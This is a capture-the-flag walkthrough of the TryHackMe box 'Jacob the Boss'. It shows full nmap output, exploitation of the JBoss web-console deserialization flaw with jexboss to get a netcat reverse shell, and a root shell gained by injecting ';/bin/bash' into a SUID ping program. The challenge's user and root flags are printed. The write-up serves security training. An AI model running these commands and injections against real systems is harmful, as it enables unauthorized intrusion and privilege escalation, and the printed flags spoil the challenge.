From aldeid
Jump to navigation Jump to search

Jacob the Boss

Find a way in and learn a little more.

Well, the flaw that makes up this box is the reproduction found in the production environment of a customer a while ago, the verification in season consisted of two steps, the last one within the environment, we hit it head-on and more than 15 machines were vulnerable that together with the development team we were able to correct and adapt.

First of all, add the address to your hosts file.

Anyway, learn a little more, have fun!



Let’s add the vhost first, as mentionned in the description of the challenge:

$ echo "" | sudo tee -a /etc/hosts

Services enumeration

Nmap reveals that the server is quite open (probably no firewall) and several open ports are open, which leaves some room for vulnerabilities/exploits.

22/tcp   open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:ca:13:6e:d9:63:c0:5f:4a:23:a5:a5:a5:10:3c:7f (RSA)
|   256 a4:6e:d2:5d:0d:36:2e:73:2f:1d:52:9c:e5:8a:7b:04 (ECDSA)
|_  256 6f:54:a6:5e:ba:5b:ad:cc:87:ee:d3:a8:d5:e0:aa:2a (ED25519)
80/tcp   open  http        Apache httpd 2.4.6 ((CentOS) PHP/7.3.20)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.3.20
|_http-title: My first blog
111/tcp  open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
1090/tcp open  java-rmi    Java RMI
|_rmi-dumpregistry: ERROR: Script execution failed (use -d to debug)
1098/tcp open  java-rmi    Java RMI
1099/tcp open  java-object Java Object Serialization
| fingerprint-strings: 
|   NULL: 
|     java.rmi.MarshalledObject|
|     hash[
|     locBytest
|     objBytesq
|     org.jnp.server.NamingServer_Stub
|     java.rmi.server.RemoteStub
|     java.rmi.server.RemoteObject
|     xpw;
|     UnicastRef2
3306/tcp open  mysql       MariaDB (unauthorized)
4444/tcp open  java-rmi    Java RMI
4445/tcp open  java-object Java Object Serialization
4446/tcp open  java-object Java Object Serialization
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|   Potentially risky methods: PUT DELETE TRACE
|_  See
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
| http-methods: 
|_  Potentially risky methods: PUT DELETE TRACE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Welcome to JBoss™
8083/tcp open  http        JBoss service httpd
|_http-title: Site doesn't have a title (text/html).

Port 80 (DotClear)

A Dotclear blog is running on port 80/tcp. We’ll come to this later if no other vulnerability is found.

Port 8080 (JBOSS)

A JBOSS server is running on that port. Clicking on the “JBoss Web Console” link reveals that the version is 5.0.0. Searching for exploits affecting this version reveals several deserialization flaws, and a tool is available to automate the discovery of vulnerabilities against JBOSS:

Let’s download, install, and run it on our Kali machine:

[email protected]:/data/Jacob_the_Boss/files/jexboss$ python -u
 * --- JexBoss: Jboss verify and EXploitation Tool  --- *
 |  * And others Java Deserialization Vulnerabilities * | 
 |                                                      |
 | @author:  João Filho Matos Figueiredo                |
 | @contact: [email protected]                       |
 |                                                      |
 | @update:       |

 @version: 1.2.4

 * Checking for updates in: **

 ** Checking Host: **

 [*] Checking admin-console:                  [ OK ]
 [*] Checking Struts2:                        [ OK ]
 [*] Checking Servlet Deserialization:        [ OK ]
 [*] Checking Application Deserialization:    [ OK ]
 [*] Checking Jenkins:                        [ OK ]
 [*] Checking web-console:                    [ VULNERABLE ]
 [*] Checking jmx-console:                    [ VULNERABLE ]
 [*] Checking JMXInvokerServlet:              [ VULNERABLE ]

 * Do you want to try to run an automated exploitation via "web-console" ?
   If successful, this operation will provide a simple command shell to execute 
   commands on the server..
   Continue only if you have permission!
   yes/NO? yes

 * Sending exploit code to Please wait...

At this stage, you can start a listener in another window (rlwrap nc -nlvp 4444) and provide jexboss with your local IP and port (the RHOST and RPORT are a bit confusing as it shoudl actually be LHOST and LPORT).

 * Please enter the IP address and tcp PORT of your listening server for try to get a REVERSE SHELL.
   OBS: You can also use the --cmd "command" to send specific commands to run on the server.
   IP Address (RHOST):
   Port (RPORT): 4444

 * The exploit code was successfully sent. Check if you received the reverse shell
   connection on your server or if your command was executed. 
   Type [ENTER] to continue...

The listener receives a connection from the target and spawns a reverse shell:

[email protected]:/data/vpn$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 43552
bash: no job control in this shell
[[email protected] /]$ id
uid=1001(jacob) gid=1001(jacob) groups=1001(jacob) context=system_u:system_r:initrc_t:s0

User flag

We are connected as jacob and we can read the user flag:

[[email protected] /]$ cd
[[email protected] ~]$ cat user.txt
cat user.txt

User flag: f4d491f280de360cc49e26ca1587cbcc


Rabbit hole (database)

Analyzing the source code of the DotClear installation, I was able to access the configuration file and see that the connection to the MySQL database as root is granted without password. I dumped the dc_user table and extracted the hash but was unsuccessful in cracking it with John.

Root files with SUID bit set

In the meantime, I kept enumerating the target and noticed that there is an unusual program owned by root with the SUID bit set:

[[email protected] mail]$ find / -type f -user root -perm -u=s 2>/dev/null
find / -type f -user root -perm -u=s 2>/dev/null
/usr/bin/pingsys  <------------- interesting!


The program expects a program, and as its name suggests, it should be an IP address to ping.

[[email protected] mail]$ /usr/bin/pingsys
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=63 time=46.2 ms
64 bytes from icmp_seq=2 ttl=63 time=225 ms
64 bytes from icmp_seq=3 ttl=63 time=207 ms
64 bytes from icmp_seq=4 ttl=63 time=71.5 ms

--- ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 46.203/137.642/225.427/79.531 ms

Playing a bit with the expected parameter, I eventually confirmed that the program is vulnerable to injection, as I was able to append commands to the IP, which will be executed as root. Let’s append /bin/bash to get a root shell:

[[email protected] mail]$ /usr/bin/pingsys ";/bin/bash"
/usr/bin/pingsys ";/bin/bash"
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=63 time=46.2 ms
64 bytes from icmp_seq=2 ttl=63 time=61.8 ms
64 bytes from icmp_seq=3 ttl=63 time=294 ms
64 bytes from icmp_seq=4 ttl=63 time=271 ms

--- ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3003ms
rtt min/avg/max/mdev = 46.259/168.534/294.567/114.923 ms
[[email protected] mail]# id
uid=0(root) gid=1001(jacob) groups=1001(jacob) context=system_u:system_r:initrc_t:s0

Root flag

Now elevated to root, we can get the root flag:

[[email protected] mail]# cat /root/root.txt
cat /root/root.txt

Root flag: 29a5641eaa0c01abe5749608c8232806


blog comments powered by Disqus

Keywords: ctf tryhackme JBoss deserialization jexboss